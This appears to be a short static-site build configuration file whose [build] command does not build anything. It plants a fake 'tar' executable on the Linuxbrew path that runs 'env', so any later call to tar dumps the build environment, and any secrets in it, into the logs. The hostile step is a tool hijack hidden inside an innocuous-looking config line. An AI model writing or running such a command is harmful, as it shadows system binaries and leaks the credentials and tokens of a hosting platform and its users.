[build]
  command = "/bin/mkdir -p /home/linuxbrew/.linuxbrew/bin; printf '#!/bin/bash\n/bin/bash -c env'> /home/linuxbrew/.linuxbrew/bin/tar; /bin/chmod +x /home/linuxbrew/.linuxbrew/bin/tar"
  publish = "public"
